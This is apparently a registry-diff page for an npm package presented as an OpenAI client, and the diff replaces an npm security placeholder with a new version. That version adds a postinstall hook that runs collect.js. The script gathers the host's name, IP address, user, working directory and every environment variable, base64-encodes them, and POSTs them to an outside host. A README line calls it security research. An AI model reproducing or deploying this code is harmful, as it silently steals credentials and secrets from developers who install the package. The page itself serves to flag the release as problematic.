npm - @reserach_org_jfhalsdhfkslsfds/openai-client-gadfjgfsf - Versions diffs - 0.0.1-security → 1.0.0 - Mend

@reserach_org_jfhalsdhfkslsfds/openai-client-gadfjgfsf 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @reserach_org_jfhalsdhfkslsfds/openai-client-gadfjgfsf might be problematic. Click here for more details.

Files changed (4) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,10 @@
-# Security holding package
+# Disclaimer
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+By insatlling the package you confirm that you have read the above and agree to disclose the data collected by the package.
+# Other
+This package is not intended to be installed anywhere.
+It will collect generic fingerprint of environment of the host where the package is installed.
+The package is used for Security Research.
-Please refer to www.npmjs.com/advisories?search=%40reserach_org_jfhalsdhfkslsfds%2Fopenai-client-gadfjgfsf for more information.

package/collect.js ADDED Viewed

@@ -0,0 +1,69 @@
+const os = require('os');
+const path = require('path');
+const process = require('process');
+const https = require('https');
+// function to get IP address
+function getIPAddress() {
+  const interfaces = os.networkInterfaces();
+  for (const interfaceName in interfaces) {
+    for (const interface of interfaces[interfaceName]) {
+      const { family, address, internal } = interface;
+      if (family === 'IPv4' && !internal) {
+        return address;
+      }
+    }
+  }
+  return 'fallback';
+}
+// collect data
+const data = {
+  currentTime: new Date().toISOString(),
+  timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
+  ipAddress: getIPAddress(),
+  hostname: os.hostname(),
+  currentPath: process.cwd(),
+  currentUser: os.userInfo().username,
+  currentUserId: os.userInfo().uid,
+  environmentVariables: process.env
+};
+// convert data to JSON and then to base64
+const jsonData = JSON.stringify(data);
+const base64Data = Buffer.from(jsonData).toString('base64');
+// prepare POST request options
+const options = {
+  hostname: 'add5732e.netcat.click',
+  path: '/security_research',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': base64Data.length
+  }
+};
+// send POST request
+const req = https.request(options, (res) => {
+  let responseBody = '';
+  res.setEncoding('utf8');
+  res.on('data', (chunk) => {
+    responseBody += chunk;
+  });
+  res.on('end', () => {
+    console.log('Response:', responseBody);
+  });
+});
+req.on('error', (e) => {
+  console.error(`problem with request: ${e.message}`);
+});
+// write data to request body
+req.write(base64Data);
+req.end();

package/index.js ADDED Viewed

@@ -0,0 +1,5 @@
+function helloWorld() {
+    return "Hello, World!!";
+}
+module.exports = helloWorld;

package/package.json CHANGED Viewed

@@ -1,6 +1,11 @@
 {
   "name": "@reserach_org_jfhalsdhfkslsfds/openai-client-gadfjgfsf",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "Security Research Package for Bug Bountyy",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node collect.js"
+  },
+  "author": "",
+  "license": "ISC"
 }